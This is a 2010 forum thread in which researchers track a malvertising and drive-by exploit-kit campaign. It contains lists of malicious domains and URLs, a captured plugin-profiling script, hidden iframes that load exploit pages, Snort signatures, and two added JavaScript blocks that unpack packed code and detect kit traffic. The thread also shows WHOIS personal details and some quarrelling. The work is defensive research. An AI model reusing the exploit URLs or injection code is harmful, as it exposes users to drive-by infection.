eight=0 alt=\"\" src=\"http://us.bc.yahoo.com/b?P=ae0af71a-6742-11df-bf5f-bf408f6
06688&T=19c202ntl%2fX%3d1274712193%2fE%3d2022775850%2fR%3dncnws%2fK%3d5%2fV%3d8.1
%2fW%3d0%2fY%3dPARTNER_US%2fF%3d293944772%2fH%3dYWx0c3BpZD0iOTY3MjgzMTUxIiBzZXJ2Z
UlkPSJhZTBhZjcxYS02NzQyLTExZGYtYmY1Zi1iZjQwOGY2MDY2ODgiIHNpdGVJZD0iODI4NTUxIiB0U3
RtcD0iMTI3NDcxMjE5Mjk4NTUwMiIgdGFyZ2V0PSJfYmxhbmsiIA--%2fQ%3d-1%2fS%3d1%2fJ%3d295
58862&U=13raiokei%2fN%3dj7RSIkwNiZE-%2fC%3d600742873.600772841.409311541.40834757
2%2fD%3dN%2fB%3d1757979682871089560%2fV%3d2\"><!--flv has invalid value--><!--rTg
has invalid value--><!--rTg has invalid value--><!--MME--><!--TRK:a:175797968287
1089560,m:600742873.600772841.409311541.408347572-->",
"type":"text/html",
"id":"1",
"size":["728x90"],
"slug":false,
"secure":false},
-
nertonic.com
Drive by:
http://nertonic.com/9bc16b427vc52/
PDF:
http://nertonic.com/657fs76fg87vc9/840099943
http://wepawet.iseclab.org/view.php?hash=744420e7136af84acdcbb12dd970b188&type=js
Java:
http://nertonic.com/657fs76fg87vc9/B0.php
Payload:
http://nertonic.com//657fs76fg87vc9/6875643787820
Detected as Win32/Fainli.A by Microsoft Security Essentials
Check-in post infection:
antispyware-scan.com
antispyware-scan.net
Getting referred to by ad.doubleclick.net
-
FYI, this is still running pretty rampant
Because you still can't be bothered to send the details to the right people that's what happens rodeo guy.
YOU could have helped to stop this a lot earlier, instead you just want to keep playing your little games.
-
FYI, I know that Dshield is part of SANS and FYI we got their blocklist available for download at Bluetack.
Microsoft still has NO information from SANS or Dshield, as reported by my contacts at AdCenter / Traffic Quality Team. Just FYI, they found several other malvertisement campaigns even with the few details I was able to provide because you wanted to play the smart way.
http://stopmalvertising.com/malvertisements/alert-new-curves-malvertisement
And NO, I don't hand out my contacts from Microsoft AdCenter, Yahoo or Google / Doubleclick to rodeo kids.
You had the elements in hand to stop these campaigns but they are still running and even more malvertisement domains have been discovered.
http://msmvps.com/blogs/spywaresucks/archive/2010/05/30/1770473.aspx
Happy now ?
-
I've alerted my contact at Yahoo about the adnet.media.unwited.com incident. Which site is that malvertisement displayed or is that again top secret too?
-
Yahoo, without any pertinent information again, took out 3 malvertisements. There might be more ....
-
And NO, I don't hand out my contacts from Microsoft AdCenter, Yahoo or Google / Doubleclick to rodeo kids.
Good for you, then keep helping the bad guys out.
Additionally if you have nothing to actually contribute to the thread that is pertinent, it is best to stay out of it.
Yahoo, without any pertinent information again, took out 3 malvertisements. There might be more ....
Then they obviously haven't taken any time to read what I post in public or bothered to contact me. I've got a bunch more, but I think I'll stop publishing that we find it and keep it to ourselves.
-
For over the last 4-5 years I've spent most of my time if not all on reporting malware.
Actually FYI, Yahoo / Right Media took out more since my last post as I have been continuously in contact with the incident team. I have the exact number of incidents which I can't disclose in public unfortunately.
Good for you, then keep helping the bad guys out.
Yeah, sure .... that's exactly what you're doing by sending the information to the wrong people and blaming me for it. Keep doing what you do and we'll see how fast something gets pulled out of an ads network.
We see guys like you all the time ... showboat ponies ...
-
For over the last 4-5 years I've spent most of my time if not all on reporting malware.
And maybe in those multiple years you would realize that shoving copies of PCAPs around to random people on web forums can lead to termination and prosecution for violating all the security controls we have to comply with under FISMA. I'm not sending you my clients pcaps regardless, so stop asking.
-
For over the last 4-5 years I've spent most of my time if not all on reporting malware.
And maybe in those multiple years you would realize that shoving copies of PCAPs around to random people on web forums can lead to termination and prosecution for violating all the security controls we have to comply with under FISMA. I'm not sending you my clients pcaps regardless, so stop asking.
hi Kimberly, hi eoin,
please slow down a bit .... both sides.... publishing pcaps in public is bad... but i guess kimberly made a mistake...
-- gerhard
-
FYI, this is still running pretty rampant
Because you still can't be bothered to send the details to the right people that's what happens rodeo guy.
YOU could have helped to stop this a lot earlier, instead you just want to keep playing your little games.
Yea, it is not the lack of proper vetting within the business process of adding new advertising affiliates. Well, that and a complete lack of major advertising organizations following their own redirects to their affiliates constantly to observe if they are serving up malware and drive bys.
It isn't like we aren't sharing a common goal, but apparently by producing to the community what is going on without risking the data of my clients, or my own job, makes you somehow blame me for the malvertising campaigns I take the time to research and disclose. All the while you continuously refuse to provide any channels or contacts that you claim to know exist to report this information to directly. The both of you completely lack the understanding of what is required to disclose traffic from my client to any other organization.
That's as nice as I am going to put it. Stay out of the thread unless you have actual pertinent information regarding domains to be added to the list. If you have some more personally oriented snipes to try and send, take it to PM. That is why it is there.
-
publishing pcaps in public is bad... but i guess kimberly made a mistake...
I didn't post a complete capture including affiliate ID's in this topic ....
BTW, you can strip out confidential information about websites and or clients, just leaving in the necessary info to identify the malicious ad before handing them over to anyone, that includes official institutions or advertising networks.
-
publishing pcaps in public is bad... but i guess kimberly made a mistake...
I didn't post a complete capture including affiliate ID's in this topic ....
BTW, you can strip out confidential information about websites and or clients, just leaving in the necessary info to identify the malicious ad before handing them over to anyone, that includes official institutions or advertising networks.
Affiliate ID's and domains don't matter to my client, data being POST'd back to servers after exploitation does. I post the affiliate ID's and domains so that they will become known and public so people can block them as we do. I will not be disclosing full PCAPs of my client to you so stop bringing it up.
Is this seriously the type of conduct that is deemed acceptable on this board?
-
Can we all calm down and put this issue to rest please. I won't allow this behaviour to continue.
We're all on the same side here and meant too be helping each other take the bad guys down. If someone doesn't wish to share contacts or data then fine, that is up to them (and as far as pcaps, most corps don't allow those to be shared publicly, or indeed privately, for obvious security reasons, stripped out or otherwise), just contact me and I'll help find the appropriate contact for you.
-
thanks to Steve for mediating this. agreed that we are all on the same team here.
-
More drive bys:
hgptd.com
http://hgptd.com/g/index.php
Redirected from:
zherlova1388.newmail.ru/ypypumu.html
puaho.notlong.com
graudin4.nm.ru/ixywesuw.html
dolieb.notlong.com
-
More redirects to the baddie domains:
http://ir.pe/2c3o
**EDIT**
Apparently this ir.pe is just some sort of URL redirection service in Spanish.
-
More still ongoing:
Ad servers:
view.atdmt.com.daxitymb.com
media.fastclick.net.tribudd.com
view.atdmt.com.cidersi.com
ad.doubleclick.net.wifell.com
adnet.media.intati.com
Seeing most of the ad services over in the 95.143.193.0/24 net now. Still redirecting clients to the known bad networks full of drive bys.
Those above malvertising domains will toss you to a stats/check in site:
Check in for stats tracking:
http://generalline.co.cc/rss.php?n=cust11
Eventually redirects you over to the actual drive by (we are supposing here as we block the destination nets on our networks):
Drive bys examples:
http://uprtx.com/rbds/mh_t.php
-
if this campaign follows patterns displayed by the last campaign the next exploit domains will be:
Hjoty.com
Bumzc.com
Potyur.com
Palcaug.com
Uoptyr.com
Uprtx.com
-
Been working on a Snort sig to track the big malvertising campaigns responsible for most of our favorite FakeAV installs. The servers return a common form of JavaScript compression commonly used by jQuery and also used by Google and others. Luckily, the servers from Google and others are not normally nginx, and the ones that are nginx are serving up the JavaScript with the correct Content-Type instead of text/html. So based on that we created this sig and have had a pretty low FP rate for the last day or so, which has helped us identify the malvertising servers and add them to the egress filters.
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"MALVERTISING eval(function(p,a,c,k,e,d) JavaScript from nginx Detected"; flow:established,to_client; content:"Server\: nginx"; nocase; offset:15; depth:15; content:"Content-Type\: text/html"; nocase; distance:20; content:"eval(function(p,a,c,k,e,d)"; nocase; distance:50; classtype:bad-unknown; sid:5600046; rev:1;)
Sample packet payload:
00000245 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d HTTP/1.1 200 OK.
00000255 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 30 .Server: nginx/0
00000265 2e 37 2e 36 35 0d 0a 44 61 74 65 3a 20 4d 6f 6e .7.65..D ate: Mon
00000275 2c 20 32 31 20 4a 75 6e 20 32 30 31 30 20 31 33 , 21 Jun 2010 13
00000285 3a 32 39 3a 34 35 20 47 4d 54 0d 0a 43 6f 6e 74 :29:45 G MT..Cont
00000295 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 ent-Type : text/h
000002A5 74 6d 6c 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e tml..Tra nsfer-En
000002B5 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d coding: chunked.
000002C5 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 .Connect ion: kee
000002D5 70 2d 61 6c 69 76 65 0d 0a 58 2d 50 6f 77 65 72 p-alive. .X-Power
000002E5 65 64 2d 42 79 3a 20 50 48 50 2f 35 2e 32 2e 31 ed-By: P HP/5.2.1
000002F5 33 0d 0a 0d 0a 66 37 32 0d 0a 65 76 61 6c 28 66 3....f72 ..eval(f
00000305 75 6e 63 74 69 6f 6e 28 70 2c 61 2c 63 2c 6b 2c unction( p,a,c,k,
00000315 65 2c 64 29 7b 65 3d 66 75 6e 63 74 69 6f 6e 28 e,d){e=f unction(
00000325 63 29 7b 72 65 74 75 72 6e 28 63 3c 61 3f 27 27 c){retur n(c<a?''
00000335 3a 65 28 70 61 72 73 65 49 6e 74 28 63 2f 61 29 :e(parse Int(c/a)
00000345 29 29 2b 28 28 63 3d 63 25 61 29 3e 33 35 3f 53 ))+((c=c %a)>35?S
00000355 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f tring.fr omCharCo
00000365 64 65 28 63 2b 32 39 29 3a 63 2e 74 6f 53 74 72 de(c+29) :c.toStr
00000375 69 6e 67 28 33 36 29 29 7d 3b 69 66 28 21 27 27 ing(36)) };if(!''
00000385 2e 72 65 70 6c 61 63 65 28 2f 5e 2f 2c 53 74 72 .replace (/^/,Str
00000395 69 6e 67 29 29 7b 77 68 69 6c 65 28 63 2d 2d 29 ing)){wh ile(c--)
000003A5 7b 64 5b 65 28 63 29 5d 3d 6b 5b 63 5d 7c 7c 65 {d[e(c)] =k[c]||e
000003B5 28 63 29 7d 6b 3d 5b 66 75 6e 63 74 69 6f 6e 28 (c)}k=[f unction(
000003C5 65 29 7b 72 65 74 75 72 6e 20 64 5b 65 5d 7d 5d e){retur n d[e]}]
Submitted it over to the guys over at ET (EmergingThreats) so it may be in future releases if it is deemed worthy.
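Since the sig above keys on the eval(function(p,a,c,k,e,d){...}) wrapper, here is an added example (my code, not anything posted in this thread) that unpacks that format statically. Instead of letting eval() run the self-decoding wrapper, it pulls out the four arguments (payload p, radix a, word count c, dictionary k) and redoes the word substitution itself, so the payload is never executed. The wrapper text is the same as in the captured packet; the payload and dictionary are made up for this example, as are the example.invalid URL and the helper names.

```javascript
// Added example, not code from the thread: a static unpacker for the
// eval(function(p,a,c,k,e,d){...}) format the rule above keys on.

// Constructed sample in the packer's exact layout. The wrapper text matches
// the captured packet; payload and dictionary are made up for this example.
// Note the empty dictionary slot at index 1: the packer leaves a word out
// when it is identical to its own encoded token ("1" here).
const SAMPLE = String.raw`eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.2(\'<3 4="5://6.7/8.9" a="1" b="1" c="d:e"></3>\');',62,15,'document||write|iframe|src|http|example|invalid|ad|php|width|height|style|visibility|hidden'.split('|'),0,{}))`;

// Encode a dictionary index the way the packer's e() does: base-a digits,
// with digits above 35 written as uppercase letters (36 -> 'A', 37 -> 'B').
function packerEncode(c, a) {
  const digit = (c % a) > 35 ? String.fromCharCode((c % a) + 29) : (c % a).toString(36);
  return (c < a ? '' : packerEncode(Math.floor(c / a), a)) + digit;
}

// Pull p, a, c and k out of the packed blob without evaluating anything.
function parsePacked(src) {
  const m = /}\('((?:[^'\\]|\\.)*)',\s*(\d+),\s*(\d+),\s*'([^']*)'\.split\('\|'\)/.exec(src);
  if (!m) return null;
  // The payload is a single-quoted JS string literal: undo \' and \\ escapes.
  const p = m[1].replace(/\\(['\\])/g, '$1');
  return { p, a: parseInt(m[2], 10), c: parseInt(m[3], 10), k: m[4].split('|') };
}

// Replay the packer's own loop: walk the dictionary from the highest index
// down and swap each whole-word token for its word. An empty slot means the
// token is already the word, so it is left alone.
function unpack(src) {
  const args = parsePacked(src);
  if (!args) throw new Error('not a p,a,c,k,e,d blob');
  let { p, a, c, k } = args;
  while (c--) {
    if (k[c]) {
      const token = packerEncode(c, a).replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
      p = p.replace(new RegExp('\\b' + token + '\\b', 'g'), k[c]);
    }
  }
  return p;
}

// What the campaign scripts write once unpacked: 1x1 hidden iframes. Return
// the src of every iframe that is hidden or one pixel wide.
function hiddenIframeSources(text) {
  const out = [];
  const re = /<iframe\b([^>]*)>/gi;
  let m;
  while ((m = re.exec(text)) !== null) {
    const attrs = m[1];
    const src = /\bsrc=["']([^"']+)["']/i.exec(attrs);
    if (src && /visibility\s*:\s*hidden|width=["']?1["']?/i.test(attrs)) out.push(src[1]);
  }
  return out;
}

const unpacked = unpack(SAMPLE);
console.log(unpacked);
console.log(hiddenIframeSources(unpacked));
```

The regex in parsePacked only understands the stock wrapper layout; a packer variant that reorders the arguments or nests a second eval needs the extracted payload fed back through unpack() again.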
-
if this campaign follows patterns displayed by the last campaign the next exploit domains will be:
Hjoty.com
Bumzc.com
Potyur.com
Palcaug.com
Uoptyr.com
Uprtx.com
Definitely, they all resolve to be within the 194.8.250.0/24 netblock. The drive by domains will flip around inside that netblock every couple of weeks or so.
Some of the other check-in sites for stats are:
jahsgdqtuz.co.cc
generalline.co.cc
New malvertising sites:
view.atdmt.com.landsm.com
media.rseeting.com
New payload/malware sites:
http://nwsplt.com/pqmmh/_dwfxw.php
***EDIT***
Looks like if the URL has already been visited, it redirects the client to Google.com based upon if the client IP has already made the request before.
-
Eoin, thanks for keeping us all up to date on this and putting together a snort sig to detect these campaigns.
the earlier campaign hosts what appears to be SEO Sploit packs on 194.8.250.60.
this most recent outbreak is also hosting what appear to be SEO Sploit packs on 194.8.250.15.
All the exploit domains in both campaigns are registered to:
Pat Casey
patcasey@xhotmail.com
+1.7149214718
fax: +1.7149214718
1201 E. Candlewood
Orange CA 92867
us
I've observed a cocktail of Bamital, TDSS, and Rogue AV dropped during these campaigns.
-
Just trying to give as much as I get from everyone else who contributes! :)
Check-in:
webclickst.co.cc
Drive-by:
fjoty.com
Malicious PDF:
http://fjoty.com/pw/hxnrgy/ghyv.pdf
Keep seeing the URLs rotate, might be time based?
http://fjoty.com/jz/cvra.php
http://fjoty.com/pw/za_pumsvx.php
When you load the page the first time, you get this back:
<html>
<body>
<script>
document.write('<form action="za_pumsvx.php" method="post"><input type="hidden" name="id" value="" />');
var id="adbac98ea8cc4816ae7652f9ade94ac6&n";
if(navigator.javaEnabled())
{
id="adbac98ea8cc4816ae7652f9ade94ac6&j";
}
for(var i=0;i<navigator.plugins.length;i++)
{
if(navigator.plugins[i].description.indexOf("Adobe Acrobat")!=-1)
{
id=id+"p";
break;
}
if(navigator.plugins[i].description.indexOf("Adobe PDF")!=-1)
{
id=id+"p";
break;
}
}
var f=document.forms[0];
f.id.value=id;
f.submit();
</script>
</body>
</html>
It enumerates the browser plugins and POSTs that info back to the server, which picks the exploit to serve up. So you would have a POST like this coming back from the client after executing the above JavaScript:
POST /pw/za_pumsvx.php HTTP/1.1
Host: fjoty.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fjoty.com/pw/za_pumsvx.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 40
id=adbac98ea8cc4816ae7652f9ade94ac6%26np
I am going to try and get some more traffic from this and see how easy it may be to sig the POST from the client. The id= sticks out pretty easy, I just don't think it is consistent because the server appears to go off of the length of the random string to determine which exploits to serve up. Should be able to sig it with a little regex though.
***EDIT***
Here is a rough Snort sig with minimal testing for clients POST'ing to the SEO Exploit kits to get themselves some malicious Java or PDF's:
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"MALVERTISING POST to SEO Exploit Kit"; flow:established,to_server; content:"POST "; depth:5; nocase; content:".php HTTP"; nocase; distance:0; pcre:"/id=[a-f0-9]{32}(&|%26)(np|jp|n|j)/iR"; classtype:bad-unknown; sid:5600047; rev:2;)
This should help track people who have been exploited by the PDF from the drive by:
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"MALVERTISING Adobe Exploited Check-In"; flow:established,to_server; content:"GET "; nocase; depth:4; uricontent:".php?&&reader_version="; nocase; classtype:trojan-activity; sid:5600048; rev:1;)
Sig developed from the following Wepawet report:
http://wepawet.iseclab.org/view.php?hash=a47d8bc28e859963220c777818a938a1&type=js
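As an added example (my code, not part of the post above), here is the same check the POST sig makes, written as a detector over raw HTTP requests so the flag letters can be decoded as well: the probe script sends "j" or "n" for navigator.javaEnabled() and appends "p" when it found an Adobe Acrobat/PDF plugin. The first sample request is the capture from the post with some headers trimmed; the other two requests, the example.invalid host and all function names are constructed for this example.

```javascript
// Added example, not code from the thread: the client check-in described
// above as a detector over raw HTTP requests, mirroring the posted Snort
// rule (POST to a .php, body id=<32 hex>(&|%26)<flags>) and decoding flags.

// Minimal request parser: request line, headers, body.
function parseRequest(raw) {
  const sep = raw.search(/\r?\n\r?\n/);
  const head = sep === -1 ? raw : raw.slice(0, sep);
  const body = sep === -1 ? '' : raw.slice(sep).replace(/^\r?\n\r?\n/, '');
  const lines = head.split(/\r?\n/);
  const [method, path] = lines[0].split(' ');
  const headers = {};
  for (const line of lines.slice(1)) {
    const i = line.indexOf(':');
    if (i > 0) headers[line.slice(0, i).trim().toLowerCase()] = line.slice(i + 1).trim();
  }
  return { method, path, headers, body };
}

// Describe the check-in, or return null when the request is not one.
// Unlike the rule's pcre, the flag group must be terminated (end of body or
// another parameter), so "id=<hex>&nothing=1" is not read as flag "n".
function classifyCheckin(raw) {
  const req = parseRequest(raw);
  if (req.method !== 'POST' || !/\.php(?:\?|$)/i.test(req.path)) return null;
  const m = /(?:^|&)id=([a-f0-9]{32})(?:&|%26)([jn])(p?)(?:&|$)/i.exec(req.body);
  if (!m) return null;
  return {
    host: req.headers.host || null,
    path: req.path,
    kitId: m[1].toLowerCase(),
    javaEnabled: m[2].toLowerCase() === 'j',   // navigator.javaEnabled() was true
    adobeReader: m[3].toLowerCase() === 'p',   // an Adobe Acrobat/PDF plugin was listed
  };
}

function scanRequests(requests) {
  return requests.map(classifyCheckin).filter(Boolean);
}

// Sample 1: the POST from the post above, headers trimmed.
const KIT_POST = [
  'POST /pw/za_pumsvx.php HTTP/1.1',
  'Host: fjoty.com',
  'User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3',
  'Referer: http://fjoty.com/pw/za_pumsvx.php',
  'Content-Type: application/x-www-form-urlencoded',
  'Content-Length: 40',
  '',
  'id=adbac98ea8cc4816ae7652f9ade94ac6%26np',
].join('\r\n');

// Sample 2 (constructed): a client with Java on and no PDF plugin.
const KIT_POST_JAVA = [
  'POST /jz/cvra.php HTTP/1.1',
  'Host: fjoty.com',
  'Content-Type: application/x-www-form-urlencoded',
  'Content-Length: 39',
  '',
  'id=00112233445566778899aabbccddeeff%26j',
].join('\r\n');

// Sample 3 (constructed): an ordinary form post to a .php page; must not hit.
const BENIGN_POST = [
  'POST /login.php HTTP/1.1',
  'Host: example.invalid',
  'Content-Type: application/x-www-form-urlencoded',
  'Content-Length: 22',
  '',
  'id=42&user=bob&pass=hi',
].join('\r\n');

const SAMPLE_REQUESTS = [KIT_POST, KIT_POST_JAVA, BENIGN_POST];
console.log(scanRequests(SAMPLE_REQUESTS));
```

The 32 hex characters are treated as an opaque kit/session id here; the post above notes the server may key off the length of that string, so logging it alongside the flags is what lets you correlate which exploit came back for which client profile.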
-
Exploit domain of the day:
fruuf.com
-
Domains recap for the last few weeks.
Malvertising Domains (Serve up Obfuscated JavaScript that redirects to check-in sites):
a123.g.doxoni.com
a123.g.honettee.com
a123.g.manilis.com
a123.g.ophori.com
a123.g.rogloard.com
ad.doubleclick.net.leastive.com
ad.doubleclick.net.mattoft.com
ad.doubleclick.net.wifell.com
ad.view.expiage.com
adnet.media.intati.com
epholo.com
h7.ch.adtech.com.niklip.com
mattoft.com
media.fastclick.net.tribudd.com
media.fastclick.net.wifell.com
media.mattoft.com
media.rseeting.com
media.torpalis.com
rismit.com
sconect.com
view.atdmt.com.cidersi.com
view.atdmt.com.daxitymb.com
view.atdmt.com.landsm.com
view.j9.atlassolutions.com.xbevs.com
Check-in sites that redirect to SEO Exploit drive by sites:
canteeve.com
deltastats0.co.cc
dmset.co.cc
fastclick01.co.cc
generalline.co.cc
getazxvision.co.cc
globalmicro.co.cc
hlrotio.co.cc
jahsgdqtuz.co.cc
linestreams.co.cc
mediaclickz.co.cc
mediafasts.co.cc
microjet.co.cc
microtrendsa.co.cc
neoplezas.co.cc
neotrapis.co.cc
orionst11.co.cc
securetrend.co.cc
sigmapopts.co.cc
statstoplex.co.cc
stcorp-as.co.cc
totaltrends.co.cc
weatherspacex.co.cc
webcharterw.co.cc
webclickst.co.cc
SEO Exploit drive by sites:
aiosstatsungenett.com
bumzc.com
chiklomba.com
fjoty.com
fnmaw.com
fruuf.com
ghutren.com
google.analytics.com.xygppovpmbh.info
google.analytics.com.qapvjonkksh.info
hjoty.com
kirtunmil.com
ljutrum.com
palcaug.com
potyur.com
preteritness.com
qtulina.com
retykub.com
sertgukl.com
statsianighteworkes.com
tjerhan.com
ttyur.com
unastatiomask.com
uoptyr.com
uprtx.com
www.obsidallynd.com
Domains referring clients to the malicious advertising services:
1077theend.com
1077thelake.com
3rdnewhampshire.webs.com
.997kiss.com
997kiss.com
a123.g.honettee.com
a123.g.rogloard.com
actionsportsblips.dailyradar.com
ad.ca.doubleclick.net
ad.doubleclick.net
ad.wikinvest.com
aetv.com
a.farlex.com
amertribes.proboards.com
angelmariem.webs.com
anorak.co.uk
arts.nationalpost.com
ashraf786.proboards.com
associatedcontent.com
audioreview.com
ballhype.com
bdv.bidvertiser.com
bemidjitakeakidfishing.webs.com
biography.com
calgaryherald.com
canada.com
cantonveterinaryhospital.webs.com
carnivoraforum.com
carreview.com
cheaptickets.com
classifieds.mtbr.com
classifieds.outdoorreview.com
combineforums.proboards.com
community.history.com
content.mtbr.com
countryblips.dailyradar.com
courses.golfreview.com
crosstieentertainment.webs.com
dailymail.co.uk
dailyradar.com
daysblips.dailyradar.com
designsbyanna.webs.com
detroit4lyfe.com
dreamriverstables.webs.com
dynamic.nasdaq.com
eagleridgervpark.webs.com
earthblips.dailyradar.com
edmontonjournal.com
faceoff.com
financialpost.com
fixya.com
forums.golfreview.com
forums.mtbr.com
forums.outdoorreview.com
forums.roadbikereview.com
froggy101.com
gallery.mtbr.com
gallery.photographyreview.com
gallery.roadbikereview.com
garagejournal.com
geekblips.dailyradar.com
.glam.com
golfreview.com
google.com
gscnccampstaffalumni.webs.com
habsinsideout.com
hair2dye4salon.com
history.com
hodagbassmasters.webs.com
hotfrog.com
ibiker.proboards.com
idiomproductions.webs.com
intellicast.com
kmbz.com
kossan.se
lablips.dailyradar.com
life.nationalpost.com
live.nationalpost.com
lolblips.dailyradar.com
lovingrats.webs.com
manitoudays.webs.com
maximumitblips.dailyradar.com
mediablips.dailyradar.com
members.webs.com
mentalfloss.com
mhsfashion.webs.com
missblackinternational.webs.com
mommyblips.com
montrealgazette.com
movieblips.dailyradar.com
mtbr.com
musicblips.dailyradar.com
n.admagnet.net
naruto-manga-spoiler.com
nasdaq.com
newrock933.com
news.nationalpost.com
newyorkblips.dailyradar.com
orbitz.com
outdoorreview.com
pchardwareblips.dailyradar.com
pgproductionsvocalstudio.webs.com
photoblips.dailyradar.com
photographyreview.com
plugins.wikinvest.com
pnta.proboards.com
process.advertangel.com
quotes.nasdaq.com
rapturefightclan.webs.com
reviews.carreview.com
reviews.mtbr.com
reviews.photographyreview.com
reviews.roadbikereview.com
revolverblips.dailyradar.com
rlslog.net
roadbikereview.com
scienceblips.dailyradar.com
showhype.com
shrinkingjeans.net
slacker.com
slitherbriggs.webs.com
soft-4all.com
sportsfanlive.com
sports.nationalpost.com
starzband.webs.com
svc1.m5prod.net
syndication.adagora.com
tampaspinsweather.webs.com
tennessean.com
theofficeblips.dailyradar.com
thesky973.com
thestarphoenix.com
throttleblips.dailyradar.com
timeaftertimeonlinedrama.webs.com
timescolonist.com
trails.mtbr.com
tvblips.dailyradar.com
usatoday.com
vancouversun.com
waitingfornextyear.com
wallstreetblips.dailyradar.com
webcache.googleusercontent.com
webs.com
wgr550.com
windsorstar.com
worldofsnails.webs.com
wrestlingblips.dailyradar.com
wrko.com
wwl.com
-
This Snort sig helps tracking the new drive by domains quite effectively:
alert TCP $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"MALVERTISING hidden iframe served by nginx"; flow:established,to_client; content:"Server\: nginx"; nocase; offset:15; depth:15; content:"<iframe src="; content:"style=\"visibility\:hidden\;\" width=\"1\" height=\"1\"></iframe>"; classtype:bad-unknown; sid:5600049; rev:1;)
Server response signature was developed from:
HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Thu, 24 Jun 2010 00:35:38 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.13
Content-Length: 137
<html>
<body>
<iframe src="http://fjoty.com/pw/za_pumsvx.php" style="visibility:hidden;" width="1" height="1"></iframe>
</body>
</html>
False positives have been non-existent so far for the past few hours.
-
Malvertising Servers:
view.atdmt.com.requild.com
Check-in/Redirectors:
trendanalytics2010.co.cc
vcztuokghrtq.co.cc
New drive-bys (change/rotate every 24 hours or so):
http://uytim.com/vz/tbbncwdv_.php - Saturday
http://kobqq.com/vc/vcc_vdz.php - Sunday
http://yopte.com/zs/bzkvfl.php - Monday (Today)
http://yopte.com/wb/adbplhr.php
More info:
Drive bys are single shot based on source IP (then they redirect to google.com on subsequent visits, even after a domain name change). Also, the JavaScript is broken and will not execute in IE8 unless you are using compatibility mode.
-
Nice catch :)
/edit
Do you have the full URL for vcztuokghrtq.co.cc please? (doesn't resolve here, and nothing on the search engines for it)
/edit 2
And this one please;
view.atdmt.com.requild.com
-
Yes indeed, here ya go.
URL: http://vcztuokghrtq.co.cc/north.php?n=cust12
Referrer: http://www.fixya.com/support/p1133609-orange_steelcore_9_surfboard_lock_snowb
Response:
HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sun, 27 Jun 2010 <REMOVED>
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.13
Content-Length: 135
<html>
<body>
<iframe src="http://kobqq.com/vc/vcc_vdz.php" style="visibility:hidden;" width="1" height="1"></iframe>
</body>
</html>
URL: http://view.atdmt.com.requild.com/MON/jview/dlnkkmgr124536131mon/direct/01/?rn=11386816&click=
Referrer: http://mac.softpedia.com/get/Math-Scientific/Best-Pair-II.shtml
-
New stuff for today:
Malvertising:
http://js.zedo.com.rc1.hiskweb.com/cr/j/cd/?rt=47210&sid=223417424&m=5171&ts=31&d=x&ctc=31&tm=sc
Redirect:
http://globalsearch5.co.cc/amiga.php?n=cust12
Exploit:
http://nhytx.com/wt/_duusz.php
-
Cheers :)
-
Do I need a special referer for
js.zedo.com.rc1.hiskweb.com/cr/j/cd/?rt=47210&sid=223417424&m=5171&ts=31&d=x&ctc=31&tm=sc
??
Script decodes to
<a href='http://www.raffaello-network.com/' target='_blank'><img src='http://js.zedo.com.rc1.hiskweb.com/banners/load.php?id=223417424' border='0' ></a>
Do you find more ?
-
The obfuscated code I have from pcap from the js.zedo.com.rc1.hiskweb.com is as follows:
